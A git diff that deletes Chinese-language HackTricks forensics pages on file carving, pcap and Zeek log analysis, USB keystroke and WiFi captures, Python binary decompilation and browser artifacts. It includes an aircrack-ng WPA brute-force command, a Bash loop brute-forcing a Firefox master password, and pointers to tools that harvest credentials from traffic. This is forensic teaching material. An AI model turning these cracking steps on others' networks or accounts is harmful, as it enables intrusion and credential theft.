**Binwalk** 是一个分析二进制文件以查找嵌入内容的工具。可以通过 `apt` 安装,其源代码在 [GitHub](https://github.com/ReFirmLabs/binwalk) 上。
**有用的命令**
```bash
sudo apt install binwalk #Insllation
binwalk file #Displays the embedded data in the given file
binwalk -e file #Displays and extracts some files from the given file
binwalk --dd ".*" file #Displays and extracts all files from the given file
```
### Foremost
另一个常用的工具来查找隐藏文件是 **foremost**。你可以在 `/etc/foremost.conf` 中找到 foremost 的配置文件。如果你只想搜索一些特定的文件请取消注释它们。如果你不取消注释任何内容foremost 将搜索其默认配置的文件类型。
```bash
sudo apt-get install foremost
foremost -v -i file.img -o output
#Discovered files will appear inside the folder "output"
```
### **Scalpel**
**Scalpel** 是另一个可以用来查找和提取 **嵌入在文件中的文件** 的工具。在这种情况下,您需要从配置文件 (_/etc/scalpel/scalpel.conf_) 中取消注释您希望提取的文件类型。
```bash
sudo apt-get install scalpel
scalpel file.img -o output
```
### Bulk Extractor
这个工具包含在kali中但你可以在这里找到它: [https://github.com/simsong/bulk_extractor](https://github.com/simsong/bulk_extractor)
这个工具可以扫描一个镜像并将**提取pcaps****网络信息URLs域名IPsMACs邮件**以及更多**文件**。你只需执行:
```
bulk_extractor memory.img -o out_folder
```
导航工具收集的**所有信息**(密码?),**分析** **数据包**(阅读[ **Pcaps分析**](../pcap-inspection/index.html)),搜索**奇怪的域名**(与**恶意软件**或**不存在**的域名相关)。
### PhotoRec
您可以在[https://www.cgsecurity.org/wiki/TestDisk_Download](https://www.cgsecurity.org/wiki/TestDisk_Download)找到它。
它提供GUI和CLI版本。您可以选择PhotoRec要搜索的**文件类型**。
![](<../../../images/image (524).png>)
### binvis
查看[代码](https://code.google.com/archive/p/binvis/)和[网页工具](https://binvis.io/#/)。
#### BinVis的特点
- 视觉和主动的**结构查看器**
- 针对不同焦点的多个图
- 专注于样本的部分
- **查看PE或ELF可执行文件中的字符串和资源**
- 获取文件的**模式**以进行密码分析
- **识别**打包器或编码器算法
- 通过模式**识别**隐写术
- **视觉**二进制差异比较
BinVis是一个很好的**起点,以熟悉未知目标**在黑箱场景中。
## 特定数据雕刻工具
### FindAES
通过搜索其密钥调度来搜索AES密钥。能够找到128、192和256位密钥例如TrueCrypt和BitLocker使用的密钥。
在[这里](https://sourceforge.net/projects/findaes/)下载。
## 补充工具
您可以使用[**viu**](https://github.com/atanunq/viu)从终端查看图像。\
您可以使用Linux命令行工具**pdftotext**将pdf转换为文本并阅读。
{{#include ../../../banners/hacktricks-training.md}}

65
src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md
View File

@ -1,65 +0,0 @@
{{#include ../../../banners/hacktricks-training.md}}
# 切割工具
## Autopsy
在取证中,最常用的工具是 [**Autopsy**](https://www.autopsy.com/download/)用于从镜像中提取文件。下载并安装它然后让它处理文件以查找“隐藏”文件。请注意Autopsy 是为支持磁盘镜像和其他类型的镜像而构建的,但不支持简单文件。
## Binwalk <a id="binwalk"></a>
**Binwalk** 是一个用于搜索二进制文件(如图像和音频文件)中嵌入文件和数据的工具。它可以通过 `apt` 安装,但 [源代码](https://github.com/ReFirmLabs/binwalk) 可以在 github 上找到。
**有用的命令**
```bash
sudo apt install binwalk #Insllation
binwalk file #Displays the embedded data in the given file
binwalk -e file #Displays and extracts some files from the given file
binwalk --dd ".*" file #Displays and extracts all files from the given file
```
## Foremost
另一个常用的工具来查找隐藏文件是 **foremost**。您可以在 `/etc/foremost.conf` 中找到 foremost 的配置文件。如果您只想搜索某些特定文件请取消注释它们。如果您不取消注释任何内容foremost 将搜索其默认配置的文件类型。
```bash
sudo apt-get install foremost
foremost -v -i file.img -o output
#Discovered files will appear inside the folder "output"
```
## **Scalpel**
**Scalpel** 是另一个可以用来查找和提取 **嵌入在文件中的文件** 的工具。在这种情况下,您需要从配置文件 \(_/etc/scalpel/scalpel.conf_\) 中取消注释您希望提取的文件类型。
```bash
sudo apt-get install scalpel
scalpel file.img -o output
```
## Bulk Extractor
这个工具包含在kali中但你可以在这里找到它: [https://github.com/simsong/bulk_extractor](https://github.com/simsong/bulk_extractor)
这个工具可以扫描一个镜像并将**提取pcaps****网络信息URLs域名IPsMACs邮件**以及更多**文件**。你只需执行:
```text
bulk_extractor memory.img -o out_folder
```
导航工具收集的**所有信息**(密码?),**分析**数据包(阅读[ **Pcaps分析**](../pcap-inspection/index.html)),搜索**奇怪的域名**(与**恶意软件**或**不存在的**域名相关)。
## PhotoRec
您可以在[https://www.cgsecurity.org/wiki/TestDisk_Download](https://www.cgsecurity.org/wiki/TestDisk_Download)找到它。
它提供GUI和CLI版本。您可以选择PhotoRec要搜索的**文件类型**。
![](../../../images/image%20%28524%29.png)
# 特定数据雕刻工具
## FindAES
通过搜索其密钥调度来搜索AES密钥。能够找到128、192和256位密钥例如TrueCrypt和BitLocker使用的密钥。
在[这里下载](https://sourceforge.net/projects/findaes/)。
# 补充工具
您可以使用[**viu**](https://github.com/atanunq/viu)从终端查看图像。
您可以使用Linux命令行工具**pdftotext**将pdf转换为文本并进行阅读。
{{#include ../../../banners/hacktricks-training.md}}

212
src/forensics/basic-forensic-methodology/pcap-inspection/README.md
View File

@ -1,212 +0,0 @@
# Pcap Inspection
{{#include ../../../banners/hacktricks-training.md}}
> [!NOTE]
> 关于 **PCAP****PCAPNG** 的说明PCAP 文件格式有两个版本;**PCAPNG 是较新的,并不是所有工具都支持**。您可能需要使用 Wireshark 或其他兼容工具将文件从 PCAPNG 转换为 PCAP以便在某些其他工具中使用。
## 在线工具用于 pcaps
- 如果您的 pcap 的头部是 **损坏的**,您应该尝试使用:[http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php) **修复**
- 在 [**PacketTotal**](https://packettotal.com) 中提取 **信息** 并搜索 pcap 内的 **恶意软件**
- 使用 [**www.virustotal.com**](https://www.virustotal.com) 和 [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) 搜索 **恶意活动**
## 提取信息
以下工具对于提取统计信息、文件等非常有用。
### Wireshark
> [!NOTE]
> **如果您要分析 PCAP您基本上必须知道如何使用 Wireshark**
您可以在以下位置找到一些 Wireshark 技巧:
{{#ref}}
wireshark-tricks.md
{{#endref}}
### Xplico Framework
[**Xplico** ](https://github.com/xplico/xplico)_(仅限 linux)_ 可以 **分析** 一个 **pcap** 并从中提取信息。例如,从一个 pcap 文件中Xplico 提取每封电子邮件POP、IMAP 和 SMTP 协议)、所有 HTTP 内容、每个 VoIP 通话SIP、FTP、TFTP 等。
**安装**
```bash
sudo bash -c 'echo "deb http://repo.xplico.org/ $(lsb_release -s -c) main" /etc/apt/sources.list'
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 791C25CE
sudo apt-get update
sudo apt-get install xplico
```
**运行**
```
/etc/init.d/apache2 restart
/etc/init.d/xplico start
```
访问 _**127.0.0.1:9876**_,凭证为 _**xplico:xplico**_
然后创建一个 **新案例**,在案例中创建一个 **新会话****上传 pcap** 文件。
### NetworkMiner
像 Xplico 一样,它是一个 **分析和提取 pcaps 中对象** 的工具。它有一个免费版,你可以 **下载** [**这里**](https://www.netresec.com/?page=NetworkMiner)。它在 **Windows** 上工作。\
这个工具也有助于从数据包中获取 **其他信息分析**,以便能够更 **快速** 地了解发生了什么。
### NetWitness Investigator
你可以从 [**这里下载 NetWitness Investigator**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(它在 Windows 上工作)**。\
这是另一个有用的工具,**分析数据包** 并以有用的方式整理信息,以 **了解内部发生的事情**
### [BruteShark](https://github.com/odedshimon/BruteShark)
- 提取和编码用户名和密码HTTP、FTP、Telnet、IMAP、SMTP...
- 提取身份验证哈希并使用 Hashcat 破解它们Kerberos、NTLM、CRAM-MD5、HTTP-Digest...
- 构建可视化网络图(网络节点和用户)
- 提取 DNS 查询
- 重建所有 TCP 和 UDP 会话
- 文件雕刻
### Capinfos
```
capinfos capture.pcap
```
### Ngrep
如果您在 pcap 中**寻找**某些**东西**,可以使用**ngrep**。以下是使用主要过滤器的示例:
```bash
ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168"
```
### 切割
使用常见的切割技术可以从 pcap 中提取文件和信息:
{{#ref}}
../partitions-file-systems-carving/file-data-carving-recovery-tools.md
{{#endref}}
### 捕获凭证
您可以使用工具如 [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) 从 pcap 或实时接口中解析凭证。
## 检查漏洞/恶意软件
### Suricata
**安装和设置**
```
apt-get install suricata
apt-get install oinkmaster
echo "url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz" >> /etc/oinkmaster.conf
oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules
```
**检查 pcap**
```
suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
```
### YaraPcap
[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) 是一个工具,可以
- 读取 PCAP 文件并提取 Http 流。
- gzip 解压任何压缩流
- 使用 yara 扫描每个文件
- 写入 report.txt
- 可选地将匹配的文件保存到一个目录
### 恶意软件分析
检查您是否可以找到已知恶意软件的任何指纹:
{{#ref}}
../malware-analysis.md
{{#endref}}
## Zeek
> [Zeek](https://docs.zeek.org/en/master/about.html) 是一个被动的开源网络流量分析器。许多操作员使用 Zeek 作为网络安全监控器 (NSM) 来支持对可疑或恶意活动的调查。Zeek 还支持广泛的流量分析任务,超出安全领域,包括性能测量和故障排除。
基本上,由 `zeek` 创建的日志不是 **pcaps**。因此,您需要使用 **其他工具** 来分析包含 **pcaps** 信息的日志。
### 连接信息
```bash
#Get info about longest connections (add "grep udp" to see only udp traffic)
#The longest connection might be of malware (constant reverse shell?)
cat conn.log | zeek-cut id.orig_h id.orig_p id.resp_h id.resp_p proto service duration | sort -nrk 7 | head -n 10
10.55.100.100 49778 65.52.108.225 443 tcp - 86222.365445
10.55.100.107 56099 111.221.29.113 443 tcp - 86220.126151
10.55.100.110 60168 40.77.229.82 443 tcp - 86160.119664
#Improve the metrics by summing up the total duration time for connections that have the same destination IP and Port.
cat conn.log | zeek-cut id.orig_h id.resp_h id.resp_p proto duration | awk 'BEGIN{ FS="\t" } { arr[$1 FS $2 FS $3 FS $4] += $5 } END{ for (key in arr) printf "%s%s%s\n", key, FS, arr[key] }' | sort -nrk 5 | head -n 10
10.55.100.100 65.52.108.225 443 tcp 86222.4
10.55.100.107 111.221.29.113 443 tcp 86220.1
10.55.100.110 40.77.229.82 443 tcp 86160.1
#Get the number of connections summed up per each line
cat conn.log | zeek-cut id.orig_h id.resp_h duration | awk 'BEGIN{ FS="\t" } { arr[$1 FS $2] += $3; count[$1 FS $2] += 1 } END{ for (key in arr) printf "%s%s%s%s%s\n", key, FS, count[key], FS, arr[key] }' | sort -nrk 4 | head -n 10
10.55.100.100 65.52.108.225 1 86222.4
10.55.100.107 111.221.29.113 1 86220.1
10.55.100.110 40.77.229.82 134 86160.1
#Check if any IP is connecting to 1.1.1.1
cat conn.log | zeek-cut id.orig_h id.resp_h id.resp_p proto service | grep '1.1.1.1' | sort | uniq -c
#Get number of connections per source IP, dest IP and dest Port
cat conn.log | zeek-cut id.orig_h id.resp_h id.resp_p proto | awk 'BEGIN{ FS="\t" } { arr[$1 FS $2 FS $3 FS $4] += 1 } END{ for (key in arr) printf "%s%s%s\n", key, FS, arr[key] }' | sort -nrk 5 | head -n 10
# RITA
#Something similar can be done with the tool rita
rita show-long-connections -H --limit 10 zeek_logs
+---------------+----------------+--------------------------+----------------+
| SOURCE IP | DESTINATION IP | DSTPORT:PROTOCOL:SERVICE | DURATION |
+---------------+----------------+--------------------------+----------------+
| 10.55.100.100 | 65.52.108.225 | 443:tcp:- | 23h57m2.3655s |
| 10.55.100.107 | 111.221.29.113 | 443:tcp:- | 23h57m0.1262s |
| 10.55.100.110 | 40.77.229.82 | 443:tcp:- | 23h56m0.1197s |
#Get connections info from rita
rita show-beacons zeek_logs | head -n 10
Score,Source IP,Destination IP,Connections,Avg Bytes,Intvl Range,Size Range,Top Intvl,Top Size,Top Intvl Count,Top Size Count,Intvl Skew,Size Skew,Intvl Dispersion,Size Dispersion
1,192.168.88.2,165.227.88.15,108858,197,860,182,1,89,53341,108319,0,0,0,0
1,10.55.100.111,165.227.216.194,20054,92,29,52,1,52,7774,20053,0,0,0,0
0.838,10.55.200.10,205.251.194.64,210,69,29398,4,300,70,109,205,0,0,0,0
```
### DNS 信息
```bash
#Get info about each DNS request performed
cat dns.log | zeek-cut -c id.orig_h query qtype_name answers
#Get the number of times each domain was requested and get the top 10
cat dns.log | zeek-cut query | sort | uniq | rev | cut -d '.' -f 1-2 | rev | sort | uniq -c | sort -nr | head -n 10
#Get all the IPs
cat dns.log | zeek-cut id.orig_h query | grep 'example\.com' | cut -f 1 | sort | uniq -c
#Sort the most common DNS record request (should be A)
cat dns.log | zeek-cut qtype_name | sort | uniq -c | sort -nr
#See top DNS domain requested with rita
rita show-exploded-dns -H --limit 10 zeek_logs
```
## 其他 pcap 分析技巧
{{#ref}}
dnscat-exfiltration.md
{{#endref}}
{{#ref}}
wifi-pcap-analysis.md
{{#endref}}
{{#ref}}
usb-keystrokes.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

14
src/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md
View File

@ -1,14 +0,0 @@
{{#include ../../../banners/hacktricks-training.md}}
如果你有一个 USB 连接的 pcap且有很多中断可能这是一个 USB 键盘连接。
这样的 wireshark 过滤器可能会很有用:`usb.transfer_type == 0x01 and frame.len == 35 and !(usb.capdata == 00:00:00:00:00:00:00:00)`
重要的是要知道,以 "02" 开头的数据是通过 shift 键按下的。
你可以在以下链接中阅读更多信息并找到一些关于如何分析的脚本:
- [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4)
- [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup)
{{#include ../../../banners/hacktricks-training.md}}

17
src/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md
View File

@ -1,17 +0,0 @@
{{#include ../../../banners/hacktricks-training.md}}
如果你有一个包含键盘通过USB通信的pcap如下所示
![](<../../../images/image (613).png>)
你可以使用工具 [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser) 来获取通信中写入的内容:
```bash
tshark -r ./usb.pcap -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata | sed 's/../:&/g2' > keystrokes.txt
python3 usbkeyboard.py ./keystrokes.txt
```
您可以阅读更多信息并找到一些关于如何分析此内容的脚本:
- [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4)
- [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup)
{{#include ../../../banners/hacktricks-training.md}}

39
src/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
View File

@ -1,39 +0,0 @@
{{#include ../../../banners/hacktricks-training.md}}
# 检查 BSSID
当你收到一个主要流量为 Wifi 的捕获文件时,可以使用 WireShark 开始调查捕获中的所有 SSID方法是选择 _Wireless --> WLAN Traffic_
![](<../../../images/image (424).png>)
![](<../../../images/image (425).png>)
## 暴力破解
该屏幕的其中一列指示是否在 pcap 中**发现了任何认证**。如果是这种情况,你可以尝试使用 `aircrack-ng` 进行暴力破解:
```bash
aircrack-ng -w pwds-file.txt -b <BSSID> file.pcap
```
例如,它将检索保护 PSK预共享密钥的 WPA 密码,这将在稍后解密流量时需要。
# 信标中的数据 / 侧信道
如果您怀疑 **数据在 Wifi 网络的信标中泄露**,可以使用以下过滤器检查网络的信标:`wlan contains <NAMEofNETWORK>`,或 `wlan.ssid == "NAMEofNETWORK"` 在过滤后的数据包中搜索可疑字符串。
# 在 Wifi 网络中查找未知 MAC 地址
以下链接将有助于查找 **在 Wifi 网络中发送数据的机器**
- `((wlan.ta == e8:de:27:16:70:c9) && !(wlan.fc == 0x8000)) && !(wlan.fc.type_subtype == 0x0005) && !(wlan.fc.type_subtype ==0x0004) && !(wlan.addr==ff:ff:ff:ff:ff:ff) && wlan.fc.type==2`
如果您已经知道 **MAC 地址,可以通过添加检查将其从输出中移除**,例如:`&& !(wlan.addr==5c:51:88:31:a0:3b)`
一旦您检测到 **在网络中通信的未知 MAC** 地址,可以使用 **过滤器**,例如:`wlan.addr==<MAC address> && (ftp || http || ssh || telnet)` 来过滤其流量。请注意ftp/http/ssh/telnet 过滤器在您解密流量后非常有用。
# 解密流量
编辑 --> 首选项 --> 协议 --> IEEE 802.11 --> 编辑
![](<../../../images/image (426).png>)
{{#include ../../../banners/hacktricks-training.md}}

201
src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
View File

@ -1,201 +0,0 @@
# 反编译已编译的python二进制文件exe, elf - 从.pyc中提取
{{#include ../../../banners/hacktricks-training.md}}
## 从已编译的二进制文件到.pyc
从一个**ELF**已编译的二进制文件中,你可以**获取.pyc**
```bash
pyi-archive_viewer <binary>
# The list of python modules will be given here:
[(0, 230, 311, 1, 'm', 'struct'),
(230, 1061, 1792, 1, 'm', 'pyimod01_os_path'),
(1291, 4071, 8907, 1, 'm', 'pyimod02_archive'),
(5362, 5609, 13152, 1, 'm', 'pyimod03_importers'),
(10971, 1473, 3468, 1, 'm', 'pyimod04_ctypes'),
(12444, 816, 1372, 1, 's', 'pyiboot01_bootstrap'),
(13260, 696, 1053, 1, 's', 'pyi_rth_pkgutil'),
(13956, 1134, 2075, 1, 's', 'pyi_rth_multiprocessing'),
(15090, 445, 672, 1, 's', 'pyi_rth_inspect'),
(15535, 2514, 4421, 1, 's', 'binary_name'),
...
? X binary_name
to filename? /tmp/binary.pyc
```
在一个**python exe 二进制**文件中,你可以通过运行来**获取 .pyc**
```bash
python pyinstxtractor.py executable.exe
```
## 从 .pyc 到 python 代码
对于 **.pyc** 数据(“编译的” python您应该开始尝试 **提取** **原始** **python** **代码**
```bash
uncompyle6 binary.pyc > decompiled.py
```
**确保**二进制文件具有**扩展名**“**.pyc**”如果没有uncompyle6 将无法工作)
在执行**uncompyle6**时,您可能会遇到**以下错误**
### 错误:未知的魔术数字 227
```bash
/kali/.local/bin/uncompyle6 /tmp/binary.pyc
Unknown magic number 227 in /tmp/binary.pyc
```
要解决此问题,您需要**在生成的文件开头添加正确的魔术数字**。
**魔术数字因 Python 版本而异**,要获取**Python 3.8**的魔术数字,您需要**打开一个 Python 3.8**终端并执行:
```
>> import imp
>> imp.get_magic().hex()
'550d0d0a'
```
在这种情况下python3.8 的 **magic number****`0x550d0d0a`**,然后,要修复此错误,您需要在 **.pyc 文件** 的 **开头** 添加以下字节:`0x0d550a0d000000000000000000000000`
**一旦** 您 **添加** 了该魔术头,**错误应该会被修复。**
这就是正确添加的 **.pyc python3.8 magic header** 的样子:
```bash
hexdump 'binary.pyc' | head
0000000 0d55 0a0d 0000 0000 0000 0000 0000 0000
0000010 00e3 0000 0000 0000 0000 0000 0000 0000
0000020 0700 0000 4000 0000 7300 0132 0000 0064
0000030 0164 006c 005a 0064 0164 016c 015a 0064
```
### 错误:反编译通用错误
**其他错误**如:`class 'AssertionError'>; co_code 应该是以下类型之一 (<class 'str'>, <class 'bytes'>, <class 'list'>, <class 'tuple'>); 是类型 <class 'NoneType'>` 可能会出现。
这可能意味着您**没有正确添加**魔数,或者您没有**使用**正确的魔数,因此请**确保使用正确的魔数**(或尝试一个新的)。
请检查之前的错误文档。
## 自动工具
[**python-exe-unpacker 工具**](https://github.com/countercept/python-exe-unpacker) 是多个社区可用工具的组合,旨在帮助研究人员解包和反编译用 Python 编写的可执行文件,特别是那些使用 py2exe 和 pyinstaller 创建的文件。它包括 YARA 规则,以识别可执行文件是否基于 Python并确认创建工具。
### ImportError: 文件名:'unpacked/malware_3.exe/**pycache**/archive.cpython-35.pyc' 不存在
一个常见问题是由于 **使用 unpy2exe 或 pyinstxtractor 解包过程**导致的不完整 Python 字节码文件,这会导致 uncompyle6 无法识别,因为缺少 Python 字节码版本号。为了解决这个问题,添加了一个前缀选项,该选项附加必要的 Python 字节码版本号,从而促进反编译过程。
问题示例:
```python
# Error when attempting to decompile without the prepend option
test@test: uncompyle6 unpacked/malware_3.exe/archive.py
Traceback (most recent call last):
...
ImportError: File name: 'unpacked/malware_3.exe/__pycache__/archive.cpython-35.pyc' doesn't exist
```
```python
# Successful decompilation after using the prepend option
test@test:python python_exe_unpack.py -p unpacked/malware_3.exe/archive
[*] On Python 2.7
[+] Magic bytes are already appended.
# Successfully decompiled file
[+] Successfully decompiled.
```
## 分析 Python 汇编
如果您无法按照之前的步骤提取 Python 的“原始”代码,那么您可以尝试 **提取** **汇编**(但 **它不是很描述性**,所以 **尝试** 再次提取 **原始代码**)。在 [这里](https://bits.theorem.co/protecting-a-python-codebase/) 我找到了一段非常简单的代码来 **反汇编** _.pyc_ 二进制文件(祝您理解代码流程好运)。如果 _.pyc_ 是来自 Python2请使用 Python2
```bash
>>> import dis
>>> import marshal
>>> import struct
>>> import imp
>>>
>>> with open('hello.pyc', 'r') as f: # Read the binary file
... magic = f.read(4)
... timestamp = f.read(4)
... code = f.read()
...
>>>
>>> # Unpack the structured content and un-marshal the code
>>> magic = struct.unpack('<H', magic[:2])
>>> timestamp = struct.unpack('<I', timestamp)
>>> code = marshal.loads(code)
>>> magic, timestamp, code
((62211,), (1425911959,), <code object <module> at 0x7fd54f90d5b0, file "hello.py", line 1>)
>>>
>>> # Verify if the magic number corresponds with the current python version
>>> struct.unpack('<H', imp.get_magic()[:2]) == magic
True
>>>
>>> # Disassemble the code object
>>> dis.disassemble(code)
1 0 LOAD_CONST 0 (<code object hello_world at 0x7f31b7240eb0, file "hello.py", line 1>)
3 MAKE_FUNCTION 0
6 STORE_NAME 0 (hello_world)
9 LOAD_CONST 1 (None)
12 RETURN_VALUE
>>>
>>> # Also disassemble that const being loaded (our function)
>>> dis.disassemble(code.co_consts[0])
2 0 LOAD_CONST 1 ('Hello {0}')
3 LOAD_ATTR 0 (format)
6 LOAD_FAST 0 (name)
9 CALL_FUNCTION 1
12 PRINT_ITEM
13 PRINT_NEWLINE
14 LOAD_CONST 0 (None)
17 RETURN_VALUE
```
## Python 转为可执行文件
首先,我们将向您展示如何在 py2exe 和 PyInstaller 中编译有效载荷。
### 使用 py2exe 创建有效载荷:
1. 从 [http://www.py2exe.org/](http://www.py2exe.org) 安装 py2exe 包。
2. 对于有效载荷(在本例中,我们将其命名为 hello.py使用如图 1 所示的脚本。选项“bundle_files”的值为 1将把所有内容包括 Python 解释器,打包成一个 exe 文件。
3. 一旦脚本准备好我们将发出命令“python setup.py py2exe”。这将创建可执行文件就像图 2 中所示。
```python
from distutils.core import setup
import py2exe, sys, os
sys.argv.append('py2exe')
setup(
options = {'py2exe': {'bundle_files': 1}},
#windows = [{'script': "hello.py"}],
console = [{'script': "hello.py"}],
zipfile = None,
)
```
```bash
C:\Users\test\Desktop\test>python setup.py py2exe
running py2exe
*** searching for required modules ***
*** parsing results ***
*** finding dlls needed ***
*** create binaries ***
*** byte compile python files ***
*** copy extensions ***
*** copy dlls ***
copying C:\Python27\lib\site-packages\py2exe\run.exe -> C:\Users\test\Desktop\test\dist\hello.exe
Adding python27.dll as resource to C:\Users\test\Desktop\test\dist\hello.exe
```
### 使用 PyInstaller 创建有效载荷:
1. 使用 pip 安装 PyInstallerpip install pyinstaller
2. 之后我们将发出命令“pyinstaller onefile hello.py”提醒一下hello.py 是我们的有效载荷)。这将把所有内容打包成一个可执行文件。
```
C:\Users\test\Desktop\test>pyinstaller --onefile hello.py
108 INFO: PyInstaller: 3.3.1
108 INFO: Python: 2.7.14
108 INFO: Platform: Windows-10-10.0.16299
………………………………
5967 INFO: checking EXE
5967 INFO: Building EXE because out00-EXE.toc is non existent
5982 INFO: Building EXE from out00-EXE.toc
5982 INFO: Appending archive to EXE C:\Users\test\Desktop\test\dist\hello.exe
6325 INFO: Building EXE from out00-EXE.toc completed successfully.
```
## 参考
- [https://blog.f-secure.com/how-to-decompile-any-python-binary/](https://blog.f-secure.com/how-to-decompile-any-python-binary/)
{{#include ../../../banners/hacktricks-training.md}}

39
src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md
View File

@ -1,39 +0,0 @@
这里可以找到特定文件类型和/或软件的有趣技巧:
{{#ref}}
.pyc.md
{{#endref}}
{{#ref}}
browser-artifacts.md
{{#endref}}
{{#ref}}
desofuscation-vbs-cscript.exe.md
{{#endref}}
{{#ref}}
local-cloud-storage.md
{{#endref}}
{{#ref}}
office-file-analysis.md
{{#endref}}
{{#ref}}
pdf-file-analysis.md
{{#endref}}
{{#ref}}
png-tricks.md
{{#endref}}
{{#ref}}
video-and-audio-file-analysis.md
{{#endref}}
{{#ref}}
zips-tricks.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

162
src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
View File

@ -1,162 +0,0 @@
# 浏览器伪迹
{{#include ../../../banners/hacktricks-training.md}}
## 浏览器伪迹 <a href="#id-3def" id="id-3def"></a>
浏览器伪迹包括由网络浏览器存储的各种类型的数据,例如导航历史、书签和缓存数据。这些伪迹保存在操作系统中的特定文件夹内,不同浏览器的位置和名称各异,但通常存储相似类型的数据。
以下是最常见的浏览器伪迹的总结:
- **导航历史**:跟踪用户访问的网站,识别访问恶意网站的情况。
- **自动完成数据**:基于频繁搜索的建议,与导航历史结合时提供洞察。
- **书签**:用户保存以便快速访问的网站。
- **扩展和附加组件**:用户安装的浏览器扩展或附加组件。
- **缓存**存储网页内容例如图像、JavaScript 文件),以提高网站加载速度,对取证分析有价值。
- **登录信息**:存储的登录凭据。
- **网站图标**:与网站相关的图标,出现在标签和书签中,有助于提供用户访问的额外信息。
- **浏览器会话**:与打开的浏览器会话相关的数据。
- **下载**:通过浏览器下载的文件记录。
- **表单数据**:在网页表单中输入的信息,保存以供将来的自动填充建议。
- **缩略图**:网站的预览图像。
- **自定义字典.txt**:用户添加到浏览器字典中的单词。
## Firefox
Firefox 在用户数据中组织配置文件,存储在基于操作系统的特定位置:
- **Linux**: `~/.mozilla/firefox/`
- **MacOS**: `/Users/$USER/Library/Application Support/Firefox/Profiles/`
- **Windows**: `%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\`
这些目录中的 `profiles.ini` 文件列出了用户配置文件。每个配置文件的数据存储在 `profiles.ini``Path` 变量命名的文件夹内,位于与 `profiles.ini` 本身相同的目录中。如果配置文件的文件夹缺失,可能已被删除。
在每个配置文件文件夹内,您可以找到几个重要文件:
- **places.sqlite**: 存储历史、书签和下载。像 [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) 这样的工具可以在 Windows 上访问历史数据。
- 使用特定的 SQL 查询提取历史和下载信息。
- **bookmarkbackups**: 包含书签的备份。
- **formhistory.sqlite**: 存储网页表单数据。
- **handlers.json**: 管理协议处理程序。
- **persdict.dat**: 自定义字典单词。
- **addons.json****extensions.sqlite**: 有关已安装的附加组件和扩展的信息。
- **cookies.sqlite**: Cookie 存储Windows 上可以使用 [MZCookiesView](https://www.nirsoft.net/utils/mzcv.html) 进行检查。
- **cache2/entries****startupCache**: 缓存数据,可以通过像 [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html) 这样的工具访问。
- **favicons.sqlite**: 存储网站图标。
- **prefs.js**: 用户设置和偏好。
- **downloads.sqlite**: 较旧的下载数据库,现在已集成到 places.sqlite 中。
- **thumbnails**: 网站缩略图。
- **logins.json**: 加密的登录信息。
- **key4.db****key3.db**: 存储用于保护敏感信息的加密密钥。
此外,可以通过在 `prefs.js` 中搜索 `browser.safebrowsing` 条目来检查浏览器的反钓鱼设置,以指示安全浏览功能是否启用或禁用。
要尝试解密主密码,可以使用 [https://github.com/unode/firefox_decrypt](https://github.com/unode/firefox_decrypt)\
使用以下脚本和调用,您可以指定一个密码文件进行暴力破解:
```bash:brute.sh
#!/bin/bash
#./brute.sh top-passwords.txt 2>/dev/null | grep -A2 -B2 "chrome:"
passfile=$1
while read pass; do
echo "Trying $pass"
echo "$pass" | python firefox_decrypt.py
done < $passfile
```
![](<../../../images/image (417).png>)
## Google Chrome
Google Chrome 根据操作系统将用户配置文件存储在特定位置:
- **Linux**: `~/.config/google-chrome/`
- **Windows**: `C:\Users\XXX\AppData\Local\Google\Chrome\User Data\`
- **MacOS**: `/Users/$USER/Library/Application Support/Google/Chrome/`
在这些目录中,大多数用户数据可以在 **Default/****ChromeDefaultData/** 文件夹中找到。以下文件包含重要数据:
- **History**: 包含 URL、下载和搜索关键字。在 Windows 上,可以使用 [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) 来读取历史记录。“Transition Type” 列有多种含义,包括用户点击链接、输入的 URL、表单提交和页面重新加载。
- **Cookies**: 存储 cookies。可以使用 [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html) 进行检查。
- **Cache**: 存储缓存数据。要检查Windows 用户可以使用 [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html)。
- **Bookmarks**: 用户书签。
- **Web Data**: 包含表单历史。
- **Favicons**: 存储网站图标。
- **Login Data**: 包含登录凭据,如用户名和密码。
